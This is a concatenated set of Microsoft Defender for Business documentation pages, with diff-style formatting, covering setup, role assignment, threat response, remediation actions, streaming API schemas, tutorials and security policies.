-| Permissions | To sign up for Defender for Business, you must be a Global Admin.<br/><br/>To access the Microsoft Defender portal, users must have one of the following [roles in Microsoft Entra ID](mdb-roles-permissions.md) assigned: <br/>- Security Reader <br/>- Security Admin <br/>- Global Admin<br/><br/>To learn more, see [Roles and permissions in Defender for Business](mdb-roles-permissions.md). |
-| Browser | Microsoft Edge or Google Chrome |
-| Client computer operating system | To manage devices in the Microsoft Defender portal, your devices must be running one of the following operating systems: <br/>- Windows 10 or 11 Business <br/>- Windows 10 or 11 Professional <br/>- Windows 10 or 11 Enterprise <br/>- Mac (the three most-current releases are supported) <br/><br/>Make sure that [KB5006738](https://support.microsoft.com/topic/october-26-2021-kb5006738-os-builds-19041-1320-19042-1320-and-19043-1320-preview-ccbce6bf-ae00-4e66-9789-ce8e7ea35541) is installed on the Windows devices. |
-| Mobile devices | To onboard mobile devices, such as iOS or Android OS, you can use [Mobile threat defense capabilities](mdb-mtd.md) or Microsoft Intune (see note 1 below).<br/><br/>For more details about onboarding devices, including requirements for mobile threat defense, see [Onboard devices to Microsoft Defender for Business](mdb-onboard-devices.md). |
-| Server license | To onboard a device running Windows Server or Linux Server, you'll need an additional license, such as [Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers) (see note 2 below). |
-| Additional server requirements | Windows Server endpoints must meet the [requirements for Defender for Endpoint](/microsoft-365/security/defender-endpoint/minimum-requirements#hardware-and-software-requirements), and enforcement scope must be turned on.<br/>1. In the Microsoft Defender portal, go to **Settings** > **Endpoints** > **Configuration management** > **Enforcement scope**. <br/>2. Select **Use MDE to enforce security configuration settings from MEM**, select **Windows Server**. <br/>3. Select **Save**.<br/><br/>Linux Server endpoints must meet the [prerequisites for Microsoft Defender for Endpoint on Linux](../defender-endpoint/microsoft-defender-endpoint-linux.md#prerequisites). |
-
-> [!NOTE]
-> 1. Microsoft Intune is not included in the standalone version of Defender for Business, but Intune can be added on. Intune is included in Microsoft 365 Business Premium.
->
-> 2. To onboard servers, we recommend using [Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers). Alternately, you could use [Microsoft Defender for Servers Plan 1 or Plan 2](/azure/defender-for-cloud/plan-defender-for-servers). To learn more, see [What happens if I have a mix of Microsoft endpoint security subscriptions?](mdb-faq.yml#what-happens-if-i-have-a-mix-of-microsoft-endpoint-security-subscriptions) and [Onboard devices to Microsoft Defender for Business](mdb-onboard-devices.md).
->
-> 3. [Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-whatis) is used to manage user permissions and device groups. Microsoft Entra ID is included in your Defender for Business subscription.
-> - If you don't have a Microsoft 365 subscription before you start your trial, Microsoft Entra ID will be provisioned for you during the activation process.
-> - If you do have another Microsoft 365 subscription when you start your Defender for Business trial, you can use your existing Microsoft Entra service.
->
-> 4. Security defaults are included in Defender for Business. If you prefer to use Conditional Access policies instead, you'll need Microsoft Entra ID P1 or P2 Plan 1 (included in [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)). To learn more, see [Multi-factor authentication](../../business-premium/m365bp-turn-on-mfa.md).
-
-## Next steps
--- If you don't already have Defender for Business, see [Get and provision Microsoft Defender for Business](get-defender-business.md).-- If you're starting a trial subscription, see the [Trial user guide: Microsoft Defender for Business](trial-playbook-defender-business.md).-- If you're ready to set up Defender for Business for your organization, see [Set up and configure Microsoft Defender for Business](mdb-setup-configuration.md).-
security Mdb Respond Mitigate Threats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-respond-mitigate-threats.md
- Title: Respond to and mitigate threats in Microsoft Defender for Business
-description: As threats are detected in Defender for Business, you can take actions to respond to those threats. See how to use the device inventory view.
----- Previously updated : 10/10/2023---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# Respond to and mitigate threats in Microsoft Defender for Business
-
-The Microsoft Defender portal enables your security team to respond to and mitigate detected threats. This article walks you through an example of how you can use Defender for Business.
-
-## View detected threats
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Notice cards on the Home page. These cards were designed to tell you at a glance how many threats were detected, how many user accounts, and what endpoints (devices) or other assets were affected. The following image is an example of cards you might see:
-
- :::image type="content" source="../../medib-examplecards.png" alt-text="Screenshot of cards in the Microsoft Defender portal":::
-
-3. Select a button or link on the card to view more information and take action. As an example, our **Devices at risk** card includes a **View details** button. Selecting that button takes us to the **Devices** list, as shown in the following image:
-
- :::image type="content" source="../../medib-device-inventory.png" alt-text="Screenshot of device inventory":::
-
- The **Devices** page lists company devices, along with their risk level and exposure level.
-
-4. Select an item, such as a device. A flyout pane opens and displays more information about alerts and incidents generated for that item, as shown in the following image:
-
- :::image type="content" source="../../medib-deviceinventory-selecteddeviceflyout.png" alt-text="Screenshot of the flyout pane for a selected device":::
-
-5. On the flyout, view the information that is displayed. Select the ellipsis (...) to open a menu that lists available actions, as shown in the following image:
-
- :::image type="content" source="../../medib-deviceinventory-selecteddeviceflyout-menu.png" alt-text="Screenshot of available actions for a selected device":::
-
-6. Select an available action. For example, you might choose **Run antivirus scan**, which starts a quick scan with Microsoft Defender Antivirus on the device. Or, you could select **Initiate Automated Investigation** to trigger an automated investigation on the device.
-
-## Next steps
--- [Learn about automatic attack disruption](mdb-attack-disruption.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-- [Manage devices in Defender for Business](mdb-manage-devices.md)-- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-
security Mdb Review Remediation Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-review-remediation-actions.md
- Title: Review remediation actions in Microsoft Defender for Business
-description: View remediations that were taken on detected threats or suspected attacks with Defender for Business.
----- Previously updated : 12/02/2022---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# Review remediation actions in the Action center
-
-As threats are detected, remediation actions come into play. Depending on the particular threat and how your security settings are configured, remediation actions might be taken automatically or only upon approval. Examples of remediation actions include stopping a process from running or removing a scheduled task.
-
-All remediation actions are tracked in the Action center.
--
-**This article describes**:
--- [How to use the Action center](#how-to-use-the-action-center)-- [Remediation actions](#remediation-actions)--
-## How to use the Action center
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, choose **Action center**.
-
-3. Select the **Pending** tab to view and approve (or reject) any pending actions. Actions can arise from antivirus/antimalware protection, automated investigations, manual response activities, or live response sessions.
-
-4. Select the **History** tab to view a list of completed actions.
-
-## Remediation actions
-
-Defender for Business includes several remediation actions. These actions include manual response actions, actions following automated investigation, and live response actions.
-
-The following table lists remediation actions that are available.
-
-| Source | Actions |
-|||
-| [Automatic attack disruption](mdb-attack-disruption.md) | - Contain a device <br/>- Contain a user <br/>- Disable a user account |
-| [Automated investigations](../defender-endpoint/automated-investigations.md) |- Quarantine a file<br/> - Remove a registry key<br/> - Kill a process<br/> - Stop a service<br/> - Disable a driver<br/> - Remove a scheduled task |
-| [Manual response actions](../defender-endpoint/respond-machine-alerts.md) |- Run antivirus scan<br/> - Isolate a device<br/> - Add an indicator to block or allow a file |
-| [Live response](../defender-endpoint/live-response.md) |- Collect forensic data<br/> - Analyze a file<br/> - Run a script<br/> - Send a suspicious entity to Microsoft for analysis<br/> - Remediate a file <br/> - Proactively hunt for threats|
-
-## Next steps
--- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Manage devices in Defender for Business](mdb-manage-devices.md)-
security Mdb Roles Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-roles-permissions.md
- Title: Assign security roles and permissions in Microsoft Defender for Business
-description: Assign roles to your cybersecurity team. Learn about these roles and permissions in Defender for Business.
----- Previously updated : 06/28/2023---- SMB-- m365-security-- m365solution-mdb-setup-- highpri-- tier1--
-# Assign security roles and permissions in Microsoft Defender for Business
-
-This article describes how to assign security roles and permissions in Defender for Business.
--
-Your organization's security team needs certain permissions to perform tasks, such as
--- Configuring Defender for Business-- Onboarding (or removing) devices-- Viewing reports about devices and threat detections-- Viewing incidents and alerts-- Taking response actions on detected threats-
-Permissions are granted through certain roles in the [Microsoft Entra ID](/azure/active-directory/roles/manage-roles-portal). These roles can be assigned in the Microsoft 365 admin center or in the Microsoft Entra admin center.
-
-## What to do
-
-1. [Learn about roles in Defender for Business](#roles-in-defender-for-business).
-2. [View or edit role assignments for your security team](#view-and-edit-role-assignments).
-3. [Proceed to your next steps](#next-steps).
--
-## Roles in Defender for Business
-
-The following table describes the three roles that can be assigned in Defender for Business. [Learn more about admin roles](../../admin/add-users/about-admin-roles.md).
-
-| Permission level | Description |
-|:|:|
-| **Global administrators** (also referred to as global admins) <br/><br/> *As a best practice, limit the number of global admins. See [Security guidelines for assigning roles](/microsoft-365/admin/add-users/about-admin-roles#security-guidelines-for-assigning-roles).* | Global admins can perform all kinds of tasks. The person who signed up your company for Microsoft 365 or for Defender for Business is a global administrator by default. Global admins typically complete the setup and configuration process in Defender for Business, including onboarding devices.<br/><br/> Global admins are able to modify settings across all Microsoft 365 portals, such as: <br/>- The Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com))<br/>- Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) |
-| **Security administrators** (also referred to as security admins) | Security admins can perform the following tasks: <br/>- View and manage security policies<br/>- View, respond to, and manage alerts <br/>- Take response actions on devices with detected threats<br/>- View security information and reports <br/><br/>In general, security admins use the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) to perform security tasks. |
-| **Security reader** | Security readers can perform the following tasks:<br/>- View a list of onboarded devices<br/>- View security policies<br/>- View alerts and detected threats<br/>- View security information and reports <br/><br/>Security readers can't add or edit security policies, nor can they onboard devices. |
-
-## View and edit role assignments
-
-> [!IMPORTANT]
-> Microsoft recommends that you grant people access to only what they need to perform their tasks. We call this concept *least privilege* for permissions. To learn more, see [Best practices for least-privileged access for applications](/azure/active-directory/develop/secure-least-privileged-access).
-
-You can use the Microsoft 365 admin center or the Microsoft Entra admin center to view and edit role assignments.
-
-## [**Microsoft 365 admin center**](#tab/M365Admin)
-
-1. Go to the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)) and sign in.
-
-2. In the navigation pane, go to **Users** > **Active users**.
-
-3. Select a user account to open their flyout pane.
-
-4. On the **Account** tab, under **Roles**, select **Manage roles**.
-
-5. To add or remove a role, use one of the following procedures:
-
- | Task | Procedure |
- |||
- | Add a role to a user account | 1. Select **Admin center access**, scroll down, and then expand **Show all by category**.<br/><br/>2. Select one of the following roles:<br/><br/>- Global Administrator (listed under **Global**)<br/>- Security Administrator (listed under **Security & Compliance**)<br/>- Security Reader (listed under **Read-only**)<br/><br/>3. Select **Save changes**. |
- | Remove a role from a user account | 1. Either select **User (no admin center access)** to remove *all* admin roles, or clear the checkbox next to one or more of the assigned roles. <br/><br/>2. Select **Save changes**. |
-
-## [**Microsoft Entra admin center**](#tab/Entra)
-
-1. Go to the Microsoft Entra admin center ([https://entra.microsoft.com](https://entra.microsoft.com/)) and sign in.
-
-2. In the navigation pane, go to **Users** > **All users**.
-
-3. Select a user account to open their profile.
-
-4. To add or remove a role, use one of the following procedures:
-
- | Task | Procedure |
- |||
- | Add a role to a user account | 1. Under **Manage**, select **Assigned roles**, and then choose **+ Add assignments**.<br/><br/>2. Search for one of the following roles, select it, and then choose **Add** to assign that role to the user account.<br/><br/>- Global Administrator<br/>- Security Administrator<br/>- Security Reader |
- | Remove a role from a user account | 1. Under **Manage**, select **Assigned roles**.<br/><br/>2. Select one or more administrative roles, and then select **X Remove assignments**. |
---
-## Next steps
--- Proceed to [Step 4: Set up email notifications for your security team](mdb-email-notifications.md).-- [Step 5: Onboard devices to Microsoft Defender for Business](mdb-onboard-devices.md)-
security Mdb Setup Configuration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-setup-configuration.md
- Title: Set up and configure Microsoft Defender for Business
-description: See how to set up your Defender for Business cybersecurity solution. Onboard devices, review your policies, and edit your settings as needed.
----- Previously updated : 05/11/2023---- SMB-- m365-security-- m365solution-mdb-setup-- highpri-- tier1--
-# Set up and configure Microsoft Defender for Business
--
-This article describes the overall setup process for Defender for Business.
--
-The process includes:
-
-1. [Getting Defender for Business](get-defender-business.md).
-2. [Adding users and assigning licenses](mdb-add-users.md).
-3. [Assigning security roles and permissions for your security team](mdb-roles-permissions.md).
-4. [Setting up email notifications for your security team](mdb-email-notifications.md).
-5. [Onboarding devices so they're protected as soon as possible](mdb-onboard-devices.md).
-6. [Setting up and reviewing your security policies and settings](mdb-configure-security-settings.md).
-
-## Setup options
-
-When you're ready to set up and configure Defender for Business, you can choose from several options:
--- **Use the setup wizard** to grant access to your security team, set up email notifications for your security team, onboard your company's Windows devices, and apply default security settings to those devices; or -- **Work through the setup process manually**, step by step, and complete the setup steps yourself.-
-> [!NOTE]
-> Using the setup wizard is optional. If you choose not to use the wizard, or if the wizard is closed before your setup process is complete, you can complete the setup and configuration process on your own.
-
-## [**Setup wizard**](#tab/Wizard)
-
-> [!IMPORTANT]
-> You must be a global administrator to complete setup tasks, including running the setup wizard. See [Security roles and permissions in Defender for Business](mdb-roles-permissions.md).
-
-1. **Get Defender for Business**. Start a trial or paid subscription today. You can choose from the standalone version of Defender for Business, or get it as part of Microsoft 365 Business Premium. See [Get Microsoft Defender for Business](get-defender-business.md). And, if you're planning to onboard servers, see [How to get Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).
-
- In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, select **Assets** > **Devices**. If Defender for Business isn't provisioned yet, that process begins now.
-
-2. **Add users and assign Defender for Business licenses**. You'll want to do this task before you run the setup wizard. See [Add users and assign licenses in Microsoft Defender for Business](mdb-add-users.md).
-
- While you're adding users, make sure to create a list of your security team's names and email addresses. This list will come in handy while you are using the setup wizard. To view a list of users, in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)), go to **Users** > **Active users**.
-
-3. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, select **Assets** > **Devices**. You should see the setup wizard home screen, as shown in the following image:
-
- :::image type="content" source="medib-wizard-start.png":::
-
- Select **Get started** to begin using the wizard.
-
-4. **Assign user permissions**. In this first step of the setup wizard, you grant your security team access to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). This portal is where you and your security team will manage your security capabilities, view alerts, and take any needed actions on detected threats. Portal access is granted through roles that imply certain permissions. [Learn more about roles and permissions](mdb-roles-permissions.md).
-
- In Defender for Business, members of your security team can be assigned one of the following three roles:<br/>
-
- - **Global Admin**: A global admin can view and edit all settings across your Microsoft 365 tenant. The global admin does the initial setup and configuration for your company's Microsoft 365 subscription.
- - **Security Administrator**: A security administrator can view and edit security settings, and take action when threats are detected.
- - **Security Reader**: A security reader can view information in reports, but can't change any security settings.
-
-5. **Set up email notifications**. In this step of the setup wizard, you can set up email notifications for your security team using the list you created in step 2. Then, when an alert is generated or a new vulnerability is discovered, your security team won't miss it even if they're away from their desk. [Learn more about email notifications](mdb-email-notifications.md).
-
-6. **Onboard and configure Windows devices**. In this step of the setup wizard, you can onboard Windows devices to Defender for Business. Onboarding devices right away helps to protect those devices from day one. Note that this step of the wizard applies to Windows devices only. You can onboard other devices later. See [Onboard devices to Microsoft Defender for Business](mdb-onboard-devices.md).
-
- > [!NOTE]
- > If your organization is using Microsoft Intune, and devices are already enrolled in Intune, Defender for Business prompts you to either continue using Intune, or switch to using the simplified configuration process in the Microsoft Defender portal. See [Choose where to manage security policies and devices](mdb-configure-security-settings.md#choose-where-to-manage-security-policies-and-devices).
- >
- > Defender for Business also offers automatic onboarding for Windows devices enrolled in Intune. Automatic onboarding is a simplified way to onboard Windows devices to Defender for Business. We recommend selecting the "all devices enrolled" option so that as Windows devices are enrolled in Intune, they're onboarded to Defender for Business automatically.
-
-7. **Configure your security policies**. Defender for Business includes default security policies for next-generation protection and firewall protection that can be applied to your company's devices. These default policies use recommended settings and are designed to provide strong protection for your devices. You can start with your default policies and add more later. See [Set up, review, and edit your security policies and settings](mdb-configure-security-settings.md).
-
-8. **Select your next step**. After the setup wizard has completed, you're prompted to choose a next step. For example, you can onboard devices, view your security dashboard, or view your security policies.
-
-## [**Manual setup**](#tab/Manual)
-
-> [!IMPORTANT]
-> You must be a global administrator to complete setup tasks. See [Security roles and permissions in Defender for Business](mdb-roles-permissions.md).
-
-1. **Get Defender for Business**. Start a trial or paid subscription today. You can choose from the standalone version of Defender for Business, or get it as part of Microsoft 365 Business Premium. See [Get Microsoft Defender for Business](get-defender-business.md). And, if you're planning to onboard servers, see [How to get Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).
-
-2. **Add users and assign licenses**. Assign a license for Defender for Business (or Microsoft 365 Business Premium, if that's your subscription) to each member of your organization to protect their devices. You'll also want to make sure multifactor authentication is enabled for all users. See [Add users and assign licenses in Microsoft Defender for Business](mdb-add-users.md).
-
-3. **Assign roles and permissions to your security team**. People on your security team need certain permissions to perform tasks such as reviewing detected threats & remediation actions, viewing & editing policies, onboarding devices, and using reports. You can grant these permissions through roles. See [Assign roles and permissions](mdb-roles-permissions.md).
-
-4. **Set up email notifications for your security team**. As alerts are generated, or new vulnerabilities are discovered, people on your security team can be notified automatically, via email messages. See [Set up email notifications](mdb-email-notifications.md).
-
-5. **Onboard devices to Defender for Business**. The sooner you get your devices onboarded to Defender for Business, the sooner they're protected. You can onboard devices in the Microsoft Defender portal. Or, if your organization is already using Microsoft Intune, you can use it to enroll devices. See [Onboard devices to Defender for Business](mdb-onboard-devices.md).
-
-6. **Set up and review your security policies and settings**. Some security policies and settings are preconfigured with default settings in Defender for Business. Other policies, such as web content filtering and attack surface reduction rules, must be set up. See [Configure your security settings and policies](mdb-configure-security-settings.md).
-
-> [!IMPORTANT]
-> If you have Microsoft 365 Business Premium, you have additional capabilities to set up and configure. See [Microsoft 365 Business Premium ΓÇô productivity and cybersecurity for small business](../../business-premium/m365bp-overview.md).
-
-
-
-## Next steps
-
-After reading this article, proceed to:
-
-1. [Get Microsoft Defender for Business](get-defender-business.md) and [Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).
-2. [Add users and assign licenses in Microsoft Defender for Business](mdb-add-users.md).
-
-After you have set up and configured Defender for Business, your next steps are to:
--- [Onboard more devices](mdb-onboard-devices.md)-- [View and edit your security policies and settings](mdb-configure-security-settings.md)-- [View your reports](mdb-reports.md)-
security Mdb Streaming Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-streaming-api.md
- Title: Use the streaming API with Microsoft Defender for Business
-description: The Defender for Endpoint streaming API is available for Defender for Business and Microsoft 365 Business Premium. Stream of device file, registry, network, sign-in events, and other data to Azure Event Hub, Azure Storage, and Microsoft Sentinel to support advanced hunting and attack detection.
--- Previously updated : 12/12/2023----- SMB-- m365-security-- m365solution-mdb-setup-- highpri-- tier1---
-# Use the streaming API with Microsoft Defender for Business
-
-If your organization has a Security Operations Center (SOC), the ability to use the [Microsoft Defender for Endpoint streaming API](../defender-endpoint/raw-data-export.md) is available for [Defender for Business](mdb-overview.md) and [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md). The API enables you to stream data, such as device file, registry, network, sign-in events, and more to one of the following
--- [Microsoft Sentinel](#use-the-streaming-api-with-microsoft-sentinel), a scalable, cloud-native solution that provides security information and event management (SIEM) and security orchestration, automation, and response (SOAR) capabilities. -- [Azure Event Hubs](#use-the-streaming-api-with-event-hubs), a modern big data streaming platform and event ingestion service that can seamlessly integrate with other Azure and Microsoft services, such as Stream Analytics, Power BI, and Event Grid, along with outside services like Apache Spark.-- [Azure Storage](/azure/storage/common/storage-introduction), Microsoft's cloud storage solution for modern data storage scenarios, with highly available, massively scalable, durable, and secure storage for a variety of data objects in the cloud. -
-With the streaming API, you can use [advanced hunting](../defender/advanced-hunting-overview.md) and [attack detection](../defender-endpoint/overview-endpoint-detection-response.md) with Defender for Business and Microsoft 365 Business Premium. The streaming API enables SOCs to view more data about devices, understand better how an attack occurred, and take steps to improve device security.
-
-## Use the streaming API with Microsoft Sentinel
-
-> [!NOTE]
-> [Microsoft Sentinel](/azure/sentinel/overview) is a paid service. Several plans and pricing options are available. See [Microsoft Sentinel pricing](https://azure.microsoft.com/pricing/details/microsoft-sentinel/).
-
-1. Make sure that Defender for Business is set up and configured, and that devices are already onboarded. See [Set up and configure Microsoft Defender for Business](mdb-setup-configuration.md).
-
-2. Create a Log Analytics workspace that you'll use with Sentinel. See [Create a Log Analytics workspace](/azure/azure-monitor/logs/quick-create-workspace?tabs=azure-portal).
-
-3. Onboard to Microsoft Sentinel. See [Quickstart: Onboard Microsoft Sentinel](/azure/sentinel/quickstart-onboard).
-
-4. Enable the Microsoft Defender XDR connector. See [Connect data from Microsoft Defender XDR to Microsoft Sentinel](/azure/sentinel/connect-microsoft-365-defender?tabs=MDE).
--
-## Use the streaming API with Event Hubs
-
-> [!NOTE]
-> [Azure Event Hubs](/azure/event-hubs/event-hubs-about) requires an Azure subscription. Before you begin, make sure to create an [event hub](/azure/event-hubs/) in your tenant. Then, sign in to the [Azure portal](https://ms.portal.azure.com/), go to **Subscriptions** > **Your subscription** > **Resource Providers** > **Register to Microsoft.insights**.
->
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com) and sign in as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to the [Data export settings page](https://security.microsoft.com/interoperability/dataexport).
-
-3. Select **Add data export settings**.
-
-4. Choose a name for your new settings.
-
-5. Choose **Forward events to Azure Event Hubs**.
-
-6. Type your **Event Hubs name** and your **Event Hubs ID**.
-
- > [!NOTE]
- > Leaving the Event Hubs name field empty creates an event hub for each category in the selected namespace. If you're not using a Dedicated Event Hubs Cluster, keep in mind that there's a limit of 10 Event Hubs namespaces.
-
- To get your **Event Hubs ID**, go to your Azure Event Hubs namespace page in the [Azure portal](https://ms.portal.azure.com/). On the **Properties** tab, copy the text under **ID**.
-
-7. Choose the events you want to stream and then select **Save**.
-
-### The schema of events in Azure Event Hubs
-
-Here's what the schema of events in Azure Event Hubs looks like:
-
-```json
-{
- "records": [
- {
- "time": "<The time WDATP received the event>"
- "tenantId": "<The Id of the tenant that the event belongs to>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <WDATP Advanced Hunting event as Json> }
- }
- ...
- ]
-}
-```
-
-Each event hub message in Azure Event Hubs contains a list of records. Each record contains the event name, the time Defender for Business received the event, the tenant to which it belongs (you get events from your tenant only), and the event in JSON format in a property called "**properties**". For more information about the schema, see [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](../defender/advanced-hunting-overview.md).
-
-## Use the streaming API with Azure Storage
-
-Azure Storage requires an Azure subscription. Before you begin, make sure to create a [Storage account](/azure/storage/common/storage-account-overview) in your tenant. Then, sign in to your [Azure tenant](https://ms.portal.azure.com/), and go to **Subscriptions** > **Your subscription** > **Resource Providers** > **Register to Microsoft.insights**.
-
-### Enable raw data streaming
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com) and sign in as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to [Data export settings page](https://security.microsoft.com/settings/mtp_settings/raw_data_export) in Microsoft Defender XDR.
-
-3. Select **Add data export settings**.
-
-4. Choose a name for your new settings.
-
-5. Choose **Forward events to Azure Storage**.
-
-6. Type your **Storage Account Resource ID**. In order to get your **Storage Account Resource ID**, go to your Storage account page in the [Azure portal](https://ms.portal.azure.com/). Then, on the **Properties** tab, copy the text under **Storage account resource ID**.
-
-7. Choose the events you want to stream and then select **Save**.
-
-### The schema of events in Azure Storage account
-
-A blob container is created for each event type. The schema of each row in a blob is the following JSON file:
-
- ```json
- {
- "time": "<The time WDATP received the event>"
- "tenantId": "<Your tenant ID>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <WDATP Advanced Hunting event as Json> }
- }
- ```
-
-Each blob contains multiple rows. Each row contains the event name, the time Defender for Business received the event, the tenant to which it belongs (you get events from your tenant only), and the event in JSON format properties. For more information about the schema of Microsoft Defender for Endpoint events, see [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](../defender/advanced-hunting-overview.md).
-
-## See also
--- [Raw Data Streaming API](../defender-endpoint/raw-data-export.md) in Defender for Endpoint-
security Mdb Tutorials https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-tutorials.md
- Title: Tutorials and simulations in Microsoft Defender for Business
-description: Learn about several tutorials to help you get started using Defender for Business.
------ Previously updated : 04/10/2024--- SMB-- m365-security-- tier1-- essentials-get-started--
-# Tutorials and simulations in Microsoft Defender for Business
-
-This article describes some scenarios to try and several tutorials and simulations that are available for Defender for Business. These resources show how Defender for Business can work for your company.
--
-## Try these scenarios
-
-The following table summarizes several scenarios to try with Defender for Business.
-
-| Scenario | Description |
-|||
-| Onboard devices using a local script | In Defender for Business, you can onboard Windows and Mac devices by using a script that you download and run on each device. The script creates a trust with Microsoft Entra ID, if that trust doesn't already exist; enrolls the device with Microsoft Intune, if you have Intune; and onboards the device to Defender for Business. To learn more, see [Onboard devices to Defender for Business](mdb-onboard-devices.md). |
-| Onboard devices using Intune | If you were already using Intune before getting Defender for Business, you can continue to use Intune admin center to onboard devices. Try onboarding your Windows, Mac, iOS, and Android devices with Microsoft Intune. To learn more, see [Device enrollment in Microsoft Intune](/mem/intune/enrollment/device-enrollment). |
-| Edit security policies | If you're managing your security policies in Defender for Business, use the **Device configuration** page to view and edit your policies. Defender for Business comes with default policies that use recommended settings to secure your company's devices as soon as they're onboarded. You can keep the default policies, edit them, and define your own policies to suit your business needs. To learn more, see [View or edit policies in Defender for Business](mdb-view-edit-policies.md). |
-| Run a simulated attack | Several tutorials and simulations are available in Defender for Business. These tutorials and simulations show how the threat-protection features of Defender for Business can work for your company. You can also use a simulated attack as a training exercise for your team. To try the tutorials, see [Recommended tutorials for Defender for Business](#recommended-tutorials-for-defender-for-business). |
-| View incidents in Microsoft 365 Lighthouse | If you're a [Microsoft Cloud Solution Provider](/partner-center/enrolling-in-the-csp-program) using Microsoft 365 Lighthouse, you can view incidents across your customers' tenants in your Microsoft 365 Lighthouse portal. To learn more, see [Microsoft 365 Lighthouse and Defender for Business](mdb-lighthouse-integration.md). |
--
-## Recommended tutorials for Defender for Business
-
-The following table describes the recommended tutorials for Defender for Business customers.
-
-| Tutorial | Description |
-|||
-| **Document Drops Backdoor** | Simulate an attack that introduces file-based malware on a test device. The tutorial describes how to use the simulation file and what to watch for in the Microsoft Defender portal. <p>This tutorial requires that Microsoft Word is installed on your test device. |
-| **Live Response** | Learn how to use basic and advanced commands with Live Response. Learn how to locate a suspicious file, remediate the file, and gather information on a device. |
-| **Microsoft Defender Vulnerability Management(core scenarios)** | Learn about Defender Vulnerability Management through three scenarios:<br/>1. Reduce your company's threat and vulnerability exposure.<br/>2. Request a remediation.<br/>3. Create an exception for security recommendations.<br/><br/>Defender Vulnerability Management uses a risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities and misconfigurations. |
-
-Each tutorial includes a walkthrough document that explains the scenario, how it works, and what to do.
-
-> [!TIP]
-> You'll see references to Microsoft Defender for Endpoint in the walkthrough documents. The tutorials listed in this article can be used with either Defender for Endpoint or Defender for Business.
-
-## How to access the tutorials
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, under **Endpoints**, choose **Tutorials**.
-
-3. Choose one of the following tutorials:
-
- - **Document Drops Backdoor**
- - **Live Response**
- - **Microsoft Defender Vulnerability Management (core scenarios)**
-
-## Next steps
--- [Manage devices in Defender for Business](mdb-manage-devices.md)-- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-- [Respond to and mitigate threats in Defender for Business](mdb-respond-mitigate-threats.md)-- [Review remediation actions in the Action center](mdb-review-remediation-actions.md)-
security Mdb View Edit Create Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-view-edit-create-policies.md
- Title: View or edit policies in Microsoft Defender for Business
-description: Learn how to view, edit, create, and delete cybersecurity policies in Defender for Business. Protect your devices with security policies.
----- Previously updated : 05/05/2023---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# View or edit policies in Microsoft Defender for Business
-
-In Defender for Business, security settings are configured through policies that are applied to devices. To help simplify your setup and configuration experience, Defender for Business includes several preconfigured policies to help protect your company's devices as soon as they are onboarded. There are other types of policies you can create as well (see [Set up, review, and edit your security policies and settings in Microsoft Defender for Business](mdb-configure-security-settings.md)).
-
-This article describes how to view, edit, and create security policies in Defender for Business.
-
-**This article includes**:
--- [A list of default policies that are included in Defender for Business](#default-policies-in-defender-for-business) (Next-generation protection and firewall)-- [Additional policies that can be set up in Defender for Business](#policies-to-set-up-in-defender-for-business) (Web content filtering, controlled folder access, and attack surface reduction rules)-- [How to view existing policies](#view-your-existing-policies)-- [How to edit an existing policy](#edit-an-existing-policy)-- [How to create a new policy](#create-a-new-policy)-
-## Default policies in Defender for Business
-
-In Defender for Business, there are two main types of default policies that are designed to protect your company's devices as soon as they're onboarded:
--- **Next-generation protection policies**, which determine how Microsoft Defender Antivirus and other threat protection features are configured; and -- **Firewall policies**, which determine what network traffic is permitted to flow to and from your company's devices.-
